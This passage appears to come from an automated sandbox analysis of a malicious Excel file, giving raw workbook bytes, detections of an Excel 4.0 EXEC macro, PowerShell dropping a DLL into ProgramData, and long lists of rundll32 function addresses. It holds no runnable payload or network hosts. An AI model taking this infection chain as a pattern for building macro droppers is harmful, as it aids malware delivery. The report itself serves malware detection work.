.".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: imedpub_6.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: imedpub_6.xls Initial sample: EXEC
Source: imedpub_6.xls Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033F8FD 9_2_0033F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033E991 9_2_0033E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033AB87 9_2_0033AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00339011 9_2_00339011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00340001 9_2_00340001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034907F 9_2_0034907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00332051 9_2_00332051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350056 9_2_00350056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003370B3 9_2_003370B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003420BA 9_2_003420BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033F09B 9_2_0033F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344116 9_2_00344116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003381B7 9_2_003381B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003351BB 9_2_003351BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00332251 9_2_00332251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034A2E8 9_2_0034A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033B2C7 9_2_0033B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033E2CC 9_2_0033E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00335361 9_2_00335361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00334346 9_2_00334346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C3A0 9_2_0034C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003513AD 9_2_003513AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034E395 9_2_0034E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034D389 9_2_0034D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F435 9_2_0034F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034044F 9_2_0034044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003364E2 9_2_003364E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348519 9_2_00348519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342550 9_2_00342550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033A55F 9_2_0033A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00335548 9_2_00335548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003495FA 9_2_003495FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033E5CF 9_2_0033E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C631 9_2_0034C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348606 9_2_00348606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034A666 9_2_0034A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033D6D8 9_2_0033D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003466CA 9_2_003466CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00337735 9_2_00337735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034473C 9_2_0034473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00339714 9_2_00339714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034176B 9_2_0034176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033B74D 9_2_0033B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00334816 9_2_00334816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00341889 9_2_00341889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00338969 9_2_00338969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034894B 9_2_0034894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003509B5 9_2_003509B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003359F2 9_2_003359F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034AA30 9_2_0034AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00331A56 9_2_00331A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033EA99 9_2_0033EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00338B3D 9_2_00338B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034BB23 9_2_0034BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00340B19 9_2_00340B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033BB7E 9_2_0033BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034CB5B 9_2_0034CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00347BA6 9_2_00347BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00339B83 9_2_00339B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344B87 9_2_00344B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348BE3 9_2_00348BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034DBEA 9_2_0034DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00332BD9 9_2_00332BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349BCF 9_2_00349BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00337C37 9_2_00337C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034AC3A 9_2_0034AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00333C3C 9_2_00333C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350C14 9_2_00350C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00334C5D 9_2_00334C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346C49 9_2_00346C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034DCF7 9_2_0034DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345CC4 9_2_00345CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00336D24 9_2_00336D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346DF8 9_2_00346DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00347DD5 9_2_00347DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00339DCF 9_2_00339DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00333E3F 9_2_00333E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350E3A 9_2_00350E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034BE27 9_2_0034BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00335E60 9_2_00335E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034AE6D 9_2_0034AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00340E53 9_2_00340E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033EE81 9_2_0033EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033AEFB 9_2_0033AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00334EE3 9_2_00334EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349EEC 9_2_00349EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034DEDC 9_2_0034DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350F33 9_2_00350F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033CF47 9_2_0033CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033DFF3 9_2_0033DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00337FF2 9_2_00337FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9011 10_2_001C9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C3C3C 10_2_001C3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D044F 10_2_001D044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D20BA 10_2_001D20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CD6D8 10_2_001CD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CF8FD 10_2_001CF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D4116 10_2_001D4116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CAB87 10_2_001CAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E13AD 10_2_001E13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D95FA 10_2_001D95FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C7FF2 10_2_001C7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C59F2 10_2_001C59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4816 10_2_001C4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0C14 10_2_001E0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D8606 10_2_001D8606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D0001 10_2_001D0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C3E3F 10_2_001C3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0E3A 10_2_001E0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DAC3A 10_2_001DAC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DF435 10_2_001DF435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C7C37 10_2_001C7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DC631 10_2_001DC631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DAA30 10_2_001DAA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DBE27 10_2_001DBE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4C5D 10_2_001C4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0056 10_2_001E0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C1A56 10_2_001C1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C2051 10_2_001C2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C2251 10_2_001C2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D0E53 10_2_001D0E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D6C49 10_2_001D6C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D907F 10_2_001D907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DAE6D 10_2_001DAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DA666 10_2_001DA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C5E60 10_2_001C5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CEA99 10_2_001CEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CF09B 10_2_001CF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D1889 10_2_001D1889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CEE81 10_2_001CEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C70B3 10_2_001C70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DDEDC 10_2_001DDEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CE2CC 10_2_001CE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D66CA 10_2_001D66CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D5CC4 10_2_001D5CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CB2C7 10_2_001CB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CAEFB 10_2_001CAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DDCF7 10_2_001DDCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D9EEC 10_2_001D9EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DA2E8 10_2_001DA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C64E2 10_2_001C64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4EE3 10_2_001C4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D8519 10_2_001D8519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D0B19 10_2_001D0B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9714 10_2_001C9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D473C 10_2_001D473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C8B3D 10_2_001C8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C7735 10_2_001C7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0F33 10_2_001E0F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C6D24 10_2_001C6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DBB23 10_2_001DBB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CA55F 10_2_001CA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DCB5B 10_2_001DCB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D2550 10_2_001D2550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CB74D 10_2_001CB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C5548 10_2_001C5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D894B 10_2_001D894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4346 10_2_001C4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CCF47 10_2_001CCF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CBB7E 10_2_001CBB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C8969 10_2_001C8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D176B 10_2_001D176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C5361 10_2_001C5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DE395 10_2_001DE395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CE991 10_2_001CE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DD389 10_2_001DD389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D4B87 10_2_001D4B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9B83 10_2_001C9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C51BB 10_2_001C51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E09B5 10_2_001E09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C81B7 10_2_001C81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7BA6 10_2_001D7BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DC3A0 10_2_001DC3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C2BD9 10_2_001C2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7DD5 10_2_001D7DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D9BCF 10_2_001D9BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9DCF 10_2_001C9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CE5CF 10_2_001CE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D6DF8 10_2_001D6DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CDFF3 10_2_001CDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DDBEA 10_2_001DDBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D8BE3 10_2_001D8BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035F8FD 11_2_0035F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035E991 11_2_0035E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035AB87 11_2_0035AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00359011 11_2_00359011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00360001 11_2_00360001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036907F 11_2_0036907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00370056 11_2_00370056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00352051 11_2_00352051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003570B3 11_2_003570B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003620BA 11_2_003620BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035F09B 11_2_0035F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00364116 11_2_00364116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003581B7 11_2_003581B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003551BB 11_2_003551BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00352251 11_2_00352251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036A2E8 11_2_0036A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035B2C7 11_2_0035B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035E2CC 11_2_0035E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00355361 11_2_00355361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00354346 11_2_00354346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036C3A0 11_2_0036C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003713AD 11_2_003713AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036E395 11_2_0036E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036D389 11_2_0036D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036F435 11_2_0036F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036044F 11_2_0036044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003564E2 11_2_003564E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00368519 11_2_00368519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00362550 11_2_00362550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035A55F 11_2_0035A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00355548 11_2_00355548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003695FA 11_2_003695FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035E5CF 11_2_0035E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036C631 11_2_0036C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00368606 11_2_00368606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036A666 11_2_0036A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035D6D8 11_2_0035D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003666CA 11_2_003666CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00357735 11_2_00357735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036473C 11_2_0036473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00359714 11_2_00359714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036176B 11_2_0036176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035B74D 11_2_0035B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00354816 11_2_00354816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00361889 11_2_00361889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00358969 11_2_00358969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036894B 11_2_0036894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003709B5 11_2_003709B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003559F2 11_2_003559F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036AA30 11_2_0036AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00351A56 11_2_00351A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035EA99 11_2_0035EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00358B3D 11_2_00358B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036BB23 11_2_0036BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00360B19 11_2_00360B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035BB7E 11_2_0035BB7E
